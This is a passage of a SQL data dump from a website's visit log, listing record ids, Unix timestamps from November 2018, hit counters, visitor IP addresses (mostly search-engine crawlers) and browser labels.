ther'),(325291,1541316720,1,1,0,0,'180.76.15.30','other'),(325292,1541316780,1,1,0,0,'5.45.207.79','other'),(325293,1541316830,4,4,0,0,'178.154.244.11','other'),(325294,1541316831,1,1,0,0,'207.46.13.117','other'),(325295,1541316835,4,4,0,0,'66.249.75.220','chrome'),(325296,1541316921,1,1,0,0,'66.249.75.201','chrome'),(325297,1541316961,1,1,0,0,'54.36.148.150','other'),(325298,1541317009,1,1,0,0,'207.46.13.216','other'),(325299,1541317026,1,1,0,0,'141.8.142.144','other'),(325300,1541317027,1,1,0,0,'37.9.113.20','other'),(325301,1541317030,1,1,0,0,'141.8.142.81','other'),(325302,1541317281,1,1,0,0,'216.244.66.241','other'),(325303,1541317334,1,1,0,0,'54.36.148.149','other'),(325304,1541317403,1,1,0,0,'66.249.75.218','chrome'),(325305,1541317488,1,1,0,0,'66.249.75.199','chrome'),(325306,1541317579,1,1,0,0,'54.36.149.71','other'),(325307,1541317891,1,1,0,0,'66.249.69.144','chrome'),(325308,1541317905,2,2,0,0,'66.249.69.140','chrome'),(325309,1541318137,1,1,0,0,'66.249.75.195','chrome'),(325310,1541318138,4,4,0,0,'66.249.75.220','chrome'),(325311,1541318451,1,1,0,0,'54.36.148.127','other'),(325312,1541318499,2,2,0,0,'66.249.75.201','chrome'),(325313,1541318525,2,2,0,0,'216.244.66.241','other'),(325314,1541318598,5,5,0,0,'66.249.75.218','chrome'),(325315,1541318694,2,2,0,0,'66.249.75.199','chrome'),(325316,1541318716,1,1,0,0,'46.229.168.134','other'),(325317,1541318719,1,1,0,0,'46.229.168.142','other'),(325318,1541318720,1,1,0,0,'202.46.51.22','chrome'),(325319,1541318814,1,1,0,0,'46.229.168.138','other'),(325320,1541318856,2,2,0,0,'66.249.75.222','chrome'),(325321,1541318999,1,1,0,0,'54.36.148.60','other'),(325322,1541319019,1,1,0,0,'54.36.148.149','other'),(325323,1541319126,1,1,0,0,'54.36.149.66','other'),(325324,1541319137,1,1,0,0,'54.36.149.13','other'),(325325,1541319224,1,1,0,0,'54.36.149.104','other'),(325326,1541319559,2,2,0,0,'66.249.69.140','chrome'),(325327,1541319730,1,1,0,0,'54.36.149.71','other'),(325328,1541319850,2,2,0,0,'66.249.75.218','chrome'),(325329,1541319965,1,1,0,0,'66.249.69.144','chrome'),(325330,1541320094,1,1,0,0,'91.196.178.58','chrome'),(325331,1541320126,1,1,0,0,'66.249.75.201','chrome'),(325333,1541320177,1,1,0,0,'207.46.13.216','other'),(325334,1541320219,1,1,0,0,'66.249.75.220','chrome'),(325335,1541320325,1,1,0,0,'54.36.148.166','other'),(325336,1541320359,1,1,0,0,'40.77.167.215','other'),(325337,1541320547,1,1,0,0,'54.36.149.24','other'),(325338,1541320583,1,1,0,0,'54.36.148.189','other'),(325339,1541320584,2,2,0,0,'54.36.148.167','other'),(325340,1541321083,1,1,0,0,'216.244.66.241','other'),(325341,1541321103,1,1,0,0,'193.106.30.98','firefox'),(325342,1541321104,2,2,0,0,'46.211.25.55','chrome'),(325343,1541321175,1,1,0,0,'54.36.148.53','other'),(325344,1541321677,2,2,0,0,'40.77.167.99','other'),(325345,1541321926,1,1,0,0,'66.249.75.199','chrome'),(325346,1541321934,3,3,0,0,'66.249.75.220','chrome'),(325347,1541322075,1,1,0,0,'54.36.148.104','other'),(325348,1541322321,2,2,0,0,'66.249.75.218','chrome'),(325349,1541322483,1,1,0,0,'207.46.13.216','other'),(325350,1541322588,1,1,0,0,'66.249.69.144','chrome'),(325351,1541322632,1,1,0,0,'54.36.148.159','other'),(325352,1541322783,1,1,0,0,'8.29.198.25','other'),(325353,1541322850,1,1,0,0,'54.36.148.222','other'),(325354,1541323047,6,6,0,0,'178.154.244.29','other'),(325355,1541323303,1,1,0,0,'54.36.148.166','other'),(325356,1541323370,2,2,0,0,'178.154.244.11','other'),(325357,1541323408,1,1,0,0,'54.36.148.220','other'),(325358,1541323781,1,1,0,0,'66.249.75.201','chrome'),(325360,1541323787,1,1,0,0,'40.77.167.99','other'),(325361,1541323797,1,1,0,0,'66.249.75.220','chrome'),(325362,1541323968,2,2,0,0,'66.249.75.218','chrome'),(325363,1541324244,2,2,0,0,'66.249.69.144','chrome'),(325364,1541324365,2,2,0,0,'93.75.27.150','chrome'),(325365,1541324373,1,1,0,0,'54.36.148.119','other'),(325366,1541324381,1,1,0,0,'8.29.198.25','other'),(325367,1541324647,1,1,0,0,'8.29.198.26','other'),(325368,1541325057,1,1,0,0,'54.36.149.47','other'),(325369,1541325059,1,1,0,0,'54.36.148.151','other'),(325370,1541325106,1,1,0,0,'54.36.148.123','other'),(325371,1541325248,1,1,0,0,'207.46.13.117','other'),(325372,1541325767,1,1,0,0,'54.36.149.91','other'),(325373,1541325837,4,4,0,0,'40.77.167.206','other'),(325374,1541325875,1,0,1,0,'66.249.69.157',''),(325375,1541325876,1,0,1,0,'66.249.69.144',''),(325376,1541326141,2,2,0,0,'40.77.167.209','other'),(325377,1541326156,1,1,0,0,'216.244.66.241','other'),(325378,1541326404,1,1,0,0,'54.36.149.8','other'),(325379,1541326412,1,1,0,0,'54.36.148.97','other'),(325380,1541326703,1,1,0,0,'178.154.244.29','other'),(325381,1541327767,1,1,0,0,'46.229.168.146','other'),(325382,1541327774,1,1,0,0,'95.163.107.70','chrome'),(325383,1541327859,1,1,0,0,'66.249.75.220','chrome'),(325384,1541328093,1,1,0,0,'54.36.148.88','other'),(325385,1541328131,1,1,0,0,'54.36.148.52','other'),(325386,1541328145,1,1,0,0,'54.36.148.195','other'),(325387,1541328177,1,1,0,0,'54.36.148.34','other'),(325388,1541328477,1,1,0,0,'46.229.168.136','other'),(325389,1541328478,1,1,0,0,'46.229.168.152','other'),(325390,1541328522,1,1,0,0,'54.36.148.159','other'),(325391,1541328883,1,1,0,0,'54.36.148.125','other'),(325392,1541329151,1,1,0,0,'54.36.149.81','other'),(325393,1541329397,2,2,0,0,'178.154.244.29','other'),(325394,1541329420,1,1,0,0,'54.36.149.106','other'),(325395,1541329498,1,1,0,0,'54.36.148.240','other'),(325396,1541329887,1,1,0,0,'54.36.148.163','other'),(325397,1541329953,1,1,0,0,'95.163.255.104','other'),(325398,1541329959,1,1,0,0,'95.163.255.114','other'),(325399,1541329966,1,1,0,0,'95.163.255.105','other'),(325400,1541329972,1,1,0,0,'95.163.255.115','other'),(325401,1541330055,1,1,0,0,'207.46.13.216','other'),(325402,1541330220,5,5,0,0,'216.244.66.241','other'),(325403,1541330322,1,1,0,0,'46.229.168.130','other'),(325404,1541330325,1,1,0,0,'46.229.168.142','other'),(325405,1541330331,1,1,0,0,'178.154.244.11','other'),(325406,1541330391,10,10,0,0,'23.237.4.26','other'),(325407,1541330463,1,1,0,0,'54.36.148.47','other'),(325408,1541330834,1,1,0,0,'54.36.149.99','other'),(325409,1541330902,2,2,0,0,'54.36.148.79','other'),(325410,1541330986,1,1,0,0,'54.36.149.101','other'),(325411,1541331092,1,1,0,0,'54.36.148.13','other'),(325412,1541331272,1,1,0,0,'216.244.66.241','other'),(325413,1541331712,1,1,0,0,'46.229.168.130','other'),(325414,1541331714,1,1,0,0,'46.229.168.138','other'),(325415,1541331808,14,14,0,0,'178.154.244.29','other'),(325417,1541331854,1,1,0,0,'54.165.59.7','other'),(325418,1541331926,1,1,0,0,'5.45.207.19','other'),(325419,1541332018,6,6,0,0,'178.154.244.11','other'),(325420,1541332053,1,1,0,0,'178.255.215.94','other'),(325421,1541332078,1,1,0,0,'54.36.149.88','other'),(325422,1541332102,1,1,0,0,'54.36.148.149','other'),(325423,1541332342,1,1,0,0,'54.36.149.6','other'),(325424,1541332430,1,1,0,0,'54.36.148.160','other'),(325425,1541332585,2,2,0,0,'18.196.149.126','other'),(325426,1541332707,2,2,0,0,'82.207.121.233','chrome'),(325427,1541332745,2,2,0,0,'178.154.244.29','other'),(325428,1541332790,1,1,0,0,'54.36.149.59','other'),(325429,1541332956,2,2,0,0,'178.154.244.11','other'),(325430,1541333131,1,1,0,0,'5.45.207.79','other'),(325431,1541333244,2,2,0,0,'91.209.11.236','other'),(325432,1541333270,1,1,0,0,'40.77.167.206','other'),(325433,1541333623,1,1,0,0,'8.29.198.27','other'),(325434,1541333799,1,1,0,0,'54.36.148.43','other'),(325435,1541334503,1,1,0,0,'54.165.59.7','other'),(325436,1541334740,1,1,0,0,'54.36.148.215','other'),(325437,1541334819,1,1,0,0,'66.249.75.222','chrome'),(325438,1541334993,1,1,0,0,'82.207.121.233','chrome'),(325439,1541334995,1,1,0,0,'54.36.148.222','other'),(325440,1541335196,1,1,0,0,'54.36.148.67','other'),(325441,1541335223,1,1,0,0,'8.29.198.26','other'),(325442,1541335491,1,1,0,0,'8.29.198.27','other'),(325443,1541335594,1,1,0,0,'54.36.148.249','other'),(325444,1541335763,1,1,0,0,'54.36.148.111','other'),(325445,1541335769,1,1,0,0,'54.36.148.59','other'),(325446,1541335784,1,1,0,0,'54.36.149.42','other'),(325447,1541335990,1,1,0,0,'54.36.148.181','other'),(325448,1541336041,1,1,0,0,'54.36.149.87','other'),(325449,1541336348,1,1,0,0,'216.244.66.241','other'),(325450,1541336701,1,1,0,0,'54.36.148.149','other'),(325451,1541336806,1,1,0,0,'40.77.167.198','other'),(325452,1541336810,1,1,0,0,'207.46.13.235','other'),(325453,1541336814,1,1,0,0,'40.77.167.206','other'),(325454,1541336819,2,2,0,0,'40.77.167.209','other'),(325455,1541336834,1,1,0,0,'66.249.75.15','chrome'),(325456,1541336950,1,1,0,0,'54.165.59.7','other'),(325457,1541337190,1,1,0,0,'54.36.148.113','other'),(325458,1541337854,2,2,0,0,'195.60.228.33','other'),(325459,1541337980,4,4,0,0,'207.46.13.235','other'),(325460,1541337991,1,1,0,0,'40.77.167.198','other'),(325461,1541338102,1,1,0,0,'54.36.148.102','other'),(325462,1541338484,1,1,0,0,'54.36.148.21','other'),(325463,1541338937,1,1,0,0,'54.36.148.246','other'),(325464,1541339166,2,2,0,0,'37.115.120.243','chrome'),(325465,1541339857,1,1,0,0,'95.163.255.99','other'),(325466,1541339860,1,1,0,0,'95.163.255.93','other'),(325467,1541340062,1,1,0,0,'54.36.149.17','other'),(325468,1541340295,1,1,0,0,'54.36.148.215','other'),(325469,1541340430,1,1,0,0,'54.36.148.75','other'),(325470,1541340537,1,1,0,0,'54.36.149.7','other'),(325471,1541340710,1,1,0,0,'54.36.148.70','other'),(325472,1541340853,1,1,0,0,'54.36.148.249','other'),(325473,1541341088,1,1,0,0,'54.36.148.188','other'),(325474,1541341633,1,1,0,0,'207.46.13.117','other'),(325475,1541342232,1,1,0,0,'54.36.148.140','other'),(325476,1541342442,1,1,0,0,'54.36.148.231','other'),(325477,1541342596,1,1,0,0,'54.36.148.48','other'),(325478,1541343146,1,1,0,0,'54.36.149.26','other'),(325479,1541343412,4,4,0,0,'216.244.66.241','other'),(325480,1541343507,4,4,0,0,'178.154.244.11','other'),(325481,1541343606,5,5,0,0,'178.154.244.29','other'),(325482,1541343995,1,1,0,0,'5.45.207.19','other'),(325483,1541344101,1,1,0,0,'54.36.148.221','other'),(325484,1541344252,1,1,0,0,'5.45.207.79','other'),(325485,1541344364,1,1,0,0,'46.211.107.105','chrome'),(325486,1541344457,1,1,0,0,'8.29.198.25','other'),(325487,1541344512,1,1,0,0,'178.154.244.29','other'),(325488,1541344854,1,1,0,0,'54.36.148.66','other'),(325489,1541345251,1,1,0,0,'54.36.149.23','other'),(325490,1541345285,1,1,0,0,'54.36.149.46','other'),(325491,1541345504,3,3,0,0,'66.249.66.40','chrome'),(325492,1541345543,1,1,0,0,'13.66.139.0','other'),(325493,1541345591,6,6,0,0,'178.154.244.29','other'),(325494,1541345755,1,1,0,0,'66.249.66.61','chrome'),(325495,1541346063,1,1,0,0,'8.29.198.27','other'),(325496,1541346184,1,1,0,0,'54.36.149.52','other'),(325497,1541346344,1,1,0,0,'8.29.198.25','other'),(325498,1541346761,1,1,0,0,'54.36.148.196','other'),(325499,1541346861,1,1,0,0,'54.36.148.20','other'),(325500,1541346874,1,1,0,0,'77.111.247.179','chrome'),(325501,1541347119,1,1,0,0,'54.36.148.95','other'),(325502,1541347292,2,2,0,0,'178.154.244.29','other'),(325503,1541347334,1,1,0,0,'40.77.167.206','other'),(325504,1541347365,1,1,0,0,'178.154.244.11','other'),(325505,1541347637,1,1,0,0,'40.77.167.209','other'),(325506,1541347719,1,1,0,0,'54.36.148.35','other'),(325507,1541348500,2,2,0,0,'66.249.66.154','chrome'),(325508,1541348599,1,1,0,0,'54.36.148.224','other'),(325509,1541349041,1,1,0,0,'54.36.149.44','other'),(325510,1541349232,1,1,0,0,'66.249.66.157','chrome'),(325511,1541349233,2,2,0,0,'66.249.66.156','chrome'),(325512,1541349363,1,1,0,0,'54.36.148.154','other'),(325513,1541349520,1,1,0,0,'216.244.66.241','other'),(325514,1541349585,1,1,0,0,'66.249.66.40','chrome'),(325515,1541349769,1,1,0,0,'66.249.66.42','chrome'),(325516,1541349828,1,1,0,0,'193.160.224.12','other'),(325517,1541350376,1,1,0,0,'54.36.148.120','other'),(325518,1541350921,1,1,0,0,'46.229.168.149','other'),(325519,1541350945,2,2,0,0,'66.249.66.152','chrome'),(325520,1541351071,1,1,0,0,'54.36.148.16','other'),(325521,1541351397,1,1,0,0,'91.196.121.15','other'),(325522,1541351545,1,1,0,0,'54.36.148.77','other'),(325523,1541351650,1,1,0,0,'54.36.148.239','other'),(325524,1541351937,1,1,0,0,'67.231.16.206','other'),(325525,1541351959,1,1,0,0,'54.36.148.121','other'),(325526,1541352077,2,2,0,0,'216.244.66.241','other'),(325527,1541352295,1,1,0,0,'40.77.167.99','other'),(325528,1541352555,1,1,0,0,'66.249.66.156','chrome'),(325529,1541352631,1,1,0,0,'95.163.255.98','other'),(325530,1541352633,1,1,0,0,'95.163.255.94','other'),(325531,1541352864,1,1,0,0,'66.249.66.154','chrome'),(325532,1541353264,3,3,0,0,'40.77.167.209','other'),(325533,1541354133,2,2,0,0,'216.244.66.241','other'),(325534,1541354377,1,1,0,0,'54.36.148.53','other'),(325535,1541354495,1,1,0,0,'54.36.148.255','other'),(325536,1541355009,2,2,0,0,'207.46.13.235','other'),(325537,1541355207,2,2,0,0,'66.249.66.155','chrome'),(325538,1541355208,2,2,0,0,'66.249.66.152','chrome'),(325539,1541355252,1,1,0,0,'180.76.15.141','other'),(325540,1541355254,1,1,0,0,'180.76.15.29','other'),(325541,1541355299,1,1,0,0,'8.29.198.26','other'),(325542,1541355633,1,1,0,0,'91.201.244.207','other'),(325543,1541355662,1,1,0,0,'66.249.66.154','chrome'),(325544,1541355694,1,1,0,0,'54.36.148.104','other'),(325545,1541355725,1,1,0,0,'40.77.167.198','other'),(325546,1541355847,1,1,0,0,'54.36.148.103','other'),(325547,1541355893,1,1,0,0,'54.36.148.119','other'),(325548,1541355963,1,1,0,0,'54.36.148.216','other'),(325549,1541356400,1,1,0,0,'54.36.149.49','other'),(325550,1541356578,1,1,0,0,'66.249.66.152','chrome'),(325551,1541356610,11,11,0,0,'178.154.244.29','other'),(325552,1541356752,4,4,0,0,'178.154.244.11','other'),(325553,1541356857,1,1,0,0,'54.36.148.217','other'),(325554,1541356919,1,1,0,0,'8.29.198.26','other'),(325555,1541357011,2,2,0,0,'5.45.207.79','other'),(325556,1541357199,1,1,0,0,'8.29.198.27','other'),(325557,1541357250,1,1,0,0,'5.45.207.19','other'),(325558,1541357601,4,4,0,0,'178.154.244.29','other'),(325559,1541357730,3,3,0,0,'66.249.66.156','chrome'),(325560,1541357758,2,2,0,0,'40.77.167.209','other'),(325561,1541357763,1,1,0,0,'207.46.13.235','other'),(325562,1541357939,1,1,0,0,'5.45.207.79','other'),(325563,1541358045,1,1,0,0,'178.154.244.11','other'),(325564,1541358062,1,1,0,0,'40.77.167.206','other'),(325565,1541358067,2,2,0,0,'40.77.167.198','other'),(325566,1541358136,1,1,0,0,'66.249.66.152','chrome'),(325567,1541358268,1,1,0,0,'216.244.66.241','other'),(325568,1541359677,1,1,0,0,'216.244.66.241','other'),(325569,1541359750,1,1,0,0,'54.36.149.97','other'),(325570,1541360019,1,1,0,0,'66.249.66.155','chrome'),(325571,1541360020,1,1,0,0,'66.249.66.156','chrome'),(325572,1541360283,1,1,0,0,'54.36.148.129','other'),(325573,1541360652,1,1,0,0,'46.229.168.142','other'),(325574,1541360654,1,1,0,0,'46.229.168.139','other'),(325575,1541360745,1,1,0,0,'54.36.148.172','other'),(325576,1541360778,1,1,0,0,'54.36.148.135','other'),(325577,1541361520,1,1,0,0,'66.249.66.156','chrome'),(325578,1541361693,1,1,0,0,'54.36.149.93','other'),(325579,1541361865,1,1,0,0,'40.77.167.99','other'),(325580,1541361906,2,2,0,0,'216.244.66.241','other'),(325581,1541362238,1,1,0,0,'54.36.148.118','other'),(325582,1541362802,1,1,0,0,'54.36.148.106','other'),(325583,1541362871,1,1,0,0,'66.249.66.61','chrome'),(325584,1541362890,1,1,0,0,'66.249.66.40','chrome'),(325585,1541363464,3,3,0,0,'66.249.66.152','chrome'),(325586,1541364272,1,1,0,0,'54.36.148.120','other'),(325587,1541365005,1,1,0,0,'54.36.149.86','other'),(325588,1541365284,1,1,0,0,'54.36.148.243','other'),(325589,1541365705,3,3,0,0,'66.249.66.152','chrome'),(325590,1541365718,1,1,0,0,'66.249.66.61','chrome'),(325591,1541365719,1,1,0,0,'66.249.66.44','chrome'),(325592,1541365745,1,1,0,0,'66.249.66.157','chrome'),(325593,1541365856,1,1,0,0,'176.14.9.250','chrome'),(325594,1541365984,1,1,0,0,'46.229.168.148','other'),(325595,1541366135,1,1,0,0,'54.36.148.199','other'),(325596,1541366150,1,1,0,0,'8.29.198.27','other'),(325597,1541366526,1,1,0,0,'54.36.148.184','other'),(325598,1541366707,1,1,0,0,'54.36.148.181','other'),(325599,1541366722,1,1,0,0,'66.249.66.156','chrome'),(325600,1541366777,1,1,0,0,'54.36.148.77','other'),(325601,1541366788,2,2,0,0,'66.249.66.40','chrome'),(325602,1541366826,1,1,0,0,'66.249.66.61','chrome'),(325603,1541367376,1,1,0,0,'66.249.66.57','chrome'),(325604,1541367377,1,1,0,0,'66.249.66.44','chrome'),(325605,1541367424,1,1,0,0,'216.244.66.241','other'),(325606,1541367449,1,1,0,0,'54.36.148.15','other'),(325607,1541367461,1,1,0,0,'54.36.149.30','other'),(325608,1541367627,1,1,0,0,'54.36.149.43','other'),(325609,1541367787,1,1,0,0,'8.29.198.26','other'),(325610,1541367939,1,1,0,0,'66.249.66.155','chrome'),(325612,1541367947,1,1,0,0,'46.133.152.17','chrome'),(325613,1541368041,1,1,0,0,'8.29.198.27','other'),(325614,1541368312,1,1,0,0,'54.36.148.29','other'),(325615,1541368963,1,1,0,0,'54.36.149.11','other'),(325616,1541369181,1,1,0,0,'54.36.148.184','other'),(325617,1541369260,1,1,0,0,'54.36.148.113','other'),(325618,1541369267,2,2,0,0,'95.163.255.97','other'),(325619,1541369348,3,3,0,0,'216.244.66.241','other'),(325620,1541369427,1,1,0,0,'54.36.148.209','other'),(325621,1541369457,1,1,0,0,'54.36.148.217','other'),(325622,1541369679,1,1,0,0,'66.249.66.156','chrome'),(325623,1541369732,7,7,0,0,'178.154.244.29','other'),(325624,1541370008,1,1,0,0,'178.154.244.11','other'),(325625,1541370210,1,1,0,0,'54.36.148.167','other'),(325626,1541370223,1,1,0,0,'54.36.149.4','other'),(325627,1541370282,1,1,0,0,'54.36.148.104','other'),(325628,1541370571,1,1,0,0,'54.36.148.154','other'),(325629,1541370588,1,1,0,0,'157.55.39.197','other'),(325630,1541370605,1,1,0,0,'178.154.244.65','other'),(325631,1541370646,5,5,0,0,'178.154.244.29','other'),(325632,1541370754,1,1,0,0,'207.46.13.216','other'),(325633,1541370796,1,1,0,0,'54.36.148.90','other'),(325634,1541370810,1,1,0,0,'66.249.66.40','chrome'),(325635,1541370930,1,1,0,0,'54.36.148.96','other'),(325636,1541370980,2,2,0,0,'66.249.66.156','chrome'),(325637,1541371126,2,2,0,0,'66.249.66.154','chrome'),(325638,1541371554,1,1,0,0,'178.154.244.29','other'),(325639,1541371924,1,1,0,0,'66.249.66.155','chrome'),(325640,1541371974,1,1,0,0,'54.36.148.143','other'),(325641,1541371980,1,1,0,0,'54.36.148.239','other'),(325642,1541372133,1,1,0,0,'54.36.148.57','other'),(325643,1541372209,1,1,0,0,'207.46.13.216','other'),(325644,1541372221,1,1,0,0,'193.106.30.98','firefox'),(325645,1541372398,1,1,0,0,'66.249.66.157','chrome'),(325646,1541372399,3,3,0,0,'66.249.66.152','chrome'),(325647,1541372573,1,1,0,0,'54.36.148.185','other'),(325648,1541372616,1,1,0,0,'178.154.244.29','other'),(325649,1541372777,1,1,0,0,'54.36.149.40','other'),(325650,1541372910,1,1,0,0,'54.36.148.117','other'),(325651,1541373055,3,3,0,0,'66.249.66.154','chrome'),(325652,1541373066,1,1,0,0,'66.249.66.156','chrome'),(325653,1541373128,1,1,0,0,'66.249.66.155','chrome'),(325654,1541373235,1,1,0,0,'207.46.13.117','other'),(325655,1541373270,1,1,0,0,'216.244.66.241','other'),(325656,1541373810,1,1,0,0,'40.77.167.124','other'),(325657,1541373824,1,1,0,0,'54.36.149.15','other'),(325658,1541373999,1,1,0,0,'54.36.149.34','other'),(325659,1541374079,1,1,0,0,'89.163.131.166','other'),(325660,1541374127,1,1,0,0,'66.249.66.61','chrome'),(325661,1541374241,1,1,0,0,'54.36.148.184','other'),(325662,1541374330,2,2,0,0,'216.244.66.241','other'),(325663,1541374335,1,1,0,0,'66.249.66.40','chrome'),(325664,1541374588,1,1,0,0,'54.36.149.20','other'),(325665,1541374714,1,1,0,0,'157.55.39.197','other'),(325666,1541374911,1,1,0,0,'54.36.148.185','other'),(325667,1541374928,1,1,0,0,'54.36.148.217','other'),(325668,1541374931,1,1,0,0,'54.36.148.62','other'),(325669,1541375364,1,1,0,0,'54.36.148.87','other'),(325670,1541375372,1,1,0,0,'54.36.149.0','other'),(325671,1541375455,1,1,0,0,'54.36.149.72','other'),(325672,1541375554,1,1,0,0,'54.36.148.160','other'),(325673,1541375715,1,1,0,0,'62.205.134.182','other'),(325674,1541375746,1,1,0,0,'54.36.148.68','other'),(325675,1541375865,1,1,0,0,'54.36.148.75','other'),(325676,1541376103,1,1,0,0,'66.249.66.157','chrome'),(325677,1541376599,1,1,0,0,'46.229.168.139','other'),(325678,1541376602,1,1,0,0,'46.229.168.148','other'),(325679,1541376737,1,1,0,0,'54.36.148.196','other'),(325680,1541376860,2,2,0,0,'216.244.66.241','other'),(325681,1541377004,1,1,0,0,'8.29.198.25','other'),(325682,1541377203,1,1,0,0,'207.46.13.117','other'),(325683,1541377345,1,1,0,0,'54.36.148.78','other'),(325684,1541377784,1,1,0,0,'54.36.148.106','other'),(325685,1541377884,1,1,0,0,'54.36.149.44','other'),(325686,1541377916,1,1,0,0,'207.46.13.216','other'),(325687,1541377933,1,1,0,0,'54.36.148.22','other'),(325688,1541377941,1,1,0,0,'54.36.148.129','other'),(325689,1541378112,1,1,0,0,'54.36.148.152','other'),(325690,1541378533,1,1,0,0,'40.77.167.209','other'),(325691,1541378641,1,1,0,0,'8.29.198.25','other'),(325692,1541378644,1,1,0,0,'54.36.148.32','other'),(325694,1541378879,1,1,0,0,'66.249.66.156','chrome'),(325695,1541378882,1,1,0,0,'8.29.198.27','other'),(325696,1541378886,1,1,0,0,'54.36.149.101','other'),(325697,1541379041,1,1,0,0,'157.55.39.197','other'),(325698,1541379476,1,1,0,0,'54.36.148.125','other'),(325699,1541379714,1,1,0,0,'66.249.66.61','chrome'),(325700,1541379715,1,1,0,0,'66.249.66.44','chrome'),(325701,1541379889,1,1,0,0,'54.36.148.136','other'),(325702,1541380006,1,1,0,0,'216.244.66.241','other'),(325703,1541380056,1,1,0,0,'54.36.148.167','other'),(325704,1541380159,1,1,0,0,'46.229.168.144','other'),(325705,1541380161,1,1,0,0,'46.229.168.150','other'),(325706,1541380443,1,1,0,0,'66.249.66.40','chrome'),(325707,1541380933,3,3,0,0,'178.154.244.29','other'),(325708,1541381014,2,2,0,0,'141.8.132.16','other'),(325709,1541381119,2,2,0,0,'87.250.224.47','other'),(325710,1541381126,1,1,0,0,'178.154.171.69','other'),(325711,1541381143,1,1,0,0,'54.36.148.126','other'),(325712,1541381258,2,2,0,0,'178.154.244.11','other'),(325713,1541381457,1,1,0,0,'5.45.207.79','other'),(325714,1541381585,1,1,0,0,'66.249.66.42','chrome'),(325715,1541381681,1,1,0,0,'54.36.149.75','other'),(325716,1541381799,1,1,0,0,'207.46.13.117','other'),(325717,1541381969,1,1,0,0,'207.46.13.216','other'),(325718,1541382055,1,1,0,0,'54.36.148.138','other'),(325719,1541382064,1,1,0,0,'46.229.168.152','other'),(325720,1541382333,1,1,0,0,'66.249.66.156','chrome'),(325721,1541382423,1,1,0,0,'5.45.207.79','other'),(325722,1541382462,1,1,0,0,'54.36.148.30','other'),(325723,1541382476,1,1,0,0,'54.36.148.67','other'),(325724,1541382508,1,1,0,0,'66.249.66.152','chrome'),(325725,1541382750,1,1,0,0,'216.244.66.241','other'),(325726,1541382869,1,1,0,0,'54.36.148.254','other'),(325727,1541383104,1,1,0,0,'54.36.148.64','other'),(325728,1541383162,1,1,0,0,'54.36.148.135','other'),(325729,1541383207,1,1,0,0,'54.36.148.70','other'),(325730,1541383664,1,1,0,0,'54.36.148.130','other'),(325731,1541383807,1,1,0,0,'54.36.149.64','other'),(325732,1541383857,1,1,0,0,'95.163.255.98','other'),(325733,1541383861,1,1,0,0,'95.163.255.96','other'),(325734,1541383864,1,1,0,0,'66.249.66.152','chrome'),(325735,1541384113,1,1,0,0,'54.36.149.11','other'),(325736,1541384136,1,1,0,0,'40.77.167.124','other'),(325737,1541384184,1,1,0,0,'216.244.66.241','other'),(325738,1541384293,1,1,0,0,'54.36.149.61','other'),(325740,1541384503,1,1,0,0,'54.36.148.192','other'),(325741,1541385815,1,1,0,0,'54.36.148.185','other'),(325742,1541386793,1,1,0,0,'54.36.149.91','other'),(325743,1541386861,1,1,0,0,'178.154.244.29','other'),(325744,1541387145,1,1,0,0,'54.36.148.63','other'),(325745,1541387459,1,1,0,0,'54.36.149.45','other'),(325746,1541387846,1,1,0,0,'8.29.198.25','other'),(325747,1541387888,1,1,0,0,'180.76.15.155','other'),(325748,1541387889,1,1,0,0,'180.76.15.144','other'),(325749,1541388682,1,1,0,0,'54.36.148.216','other'),(325750,1541388923,1,1,0,0,'207.46.13.216','other'),(325751,1541389150,2,2,0,0,'216.244.66.241','other'),(325752,1541389468,1,1,0,0,'207.46.13.235','other'),(325753,1541389485,1,1,0,0,'8.29.198.27','other'),(325754,1541389735,1,1,0,0,'54.36.148.17','other'),(325755,1541389737,1,1,0,0,'8.29.198.26','other'),(325756,1541389951,1,1,0,0,'54.36.148.54','other'),(325757,1541390182,2,2,0,0,'66.249.66.57','chrome'),(325758,1541390199,3,3,0,0,'66.249.66.40','chrome'),(325759,1541390206,1,1,0,0,'216.244.66.241','other'),(325760,1541390253,1,1,0,0,'66.249.66.59','chrome'),(325761,1541390352,1,1,0,0,'54.36.149.1','other'),(325762,1541390822,1,1,0,0,'54.36.149.85','other'),(325763,1541391085,13,13,0,0,'213.32.243.105','other'),(325764,1541391398,1,1,0,0,'54.36.148.137','other'),(325765,1541391470,1,1,0,0,'54.36.149.89','other'),(325766,1541392002,1,1,0,0,'54.36.149.27','other'),(325767,1541392059,1,1,0,0,'40.77.167.124','other'),(325768,1541392455,1,1,0,0,'54.36.148.255','other'),(325769,1541392978,1,1,0,0,'54.36.149.46','other'),(325770,1541393025,1,1,0,0,'216.244.66.241','other'),(325771,1541393423,1,1,0,0,'207.46.13.216','other'),(325772,1541393535,1,1,0,0,'207.46.13.235','other'),(325773,1541393540,1,1,0,0,'207.46.13.252','other'),(325774,1541393789,1,1,0,0,'54.36.148.128','other'),(325775,1541394359,1,1,0,0,'54.36.148.94','other'),(325776,1541394491,1,1,0,0,'54.36.148.206','other'),(325777,1541394731,1,1,0,0,'54.36.149.49','other'),(325778,1541394943,2,2,0,0,'216.244.66.241','other'),(325779,1541395020,1,1,0,0,'54.36.148.116','other'),(325780,1541395151,1,1,0,0,'207.46.13.216','other'),(325781,1541395208,1,1,0,0,'107.21.1.8','other'),(325782,1541395210,1,1,0,0,'54.208.102.37','other'),(325783,1541395322,1,1,0,0,'54.36.149.15','other'),(325784,1541395948,1,1,0,0,'54.36.148.247','other'),(325785,1541396156,1,1,0,0,'54.36.149.96','other'),(325786,1541396169,1,1,0,0,'54.36.149.64','other'),(325787,1541396249,1,1,0,0,'207.46.13.252','other'),(325788,1541396511,2,2,0,0,'157.55.39.197','other'),(325789,1541396549,1,1,0,0,'207.46.13.229','other'),(325790,1541396558,1,1,0,0,'54.36.148.112','other'),(325791,1541396604,1,1,0,0,'66.249.66.156','chrome'),(325792,1541396605,1,1,0,0,'66.249.66.154','chrome'),(325793,1541396621,1,1,0,0,'54.36.149.47','other'),(325794,1541396682,7,7,0,0,'66.249.66.59','chrome'),(325795,1541396684,8,8,0,0,'66.249.66.40','chrome'),(325796,1541396721,2,2,0,0,'66.249.66.44','chrome'),(325797,1541396747,8,8,0,0,'66.249.66.57','chrome'),(325798,1541396852,6,6,0,0,'66.249.66.42','chrome'),(325799,1541396890,1,1,0,0,'66.249.66.155','chrome'),(325800,1541396891,2,2,0,0,'66.249.66.152','chrome'),(325801,1541396928,1,1,0,0,'54.36.149.48','other'),(325802,1541397044,1,1,0,0,'54.36.148.180','other'),(325803,1541397139,1,1,0,0,'66.249.66.61','chrome'),(325804,1541397168,2,2,0,0,'40.77.167.124','other'),(325805,1541397508,1,1,0,0,'54.36.148.40','other'),(325806,1541397558,1,1,0,0,'66.24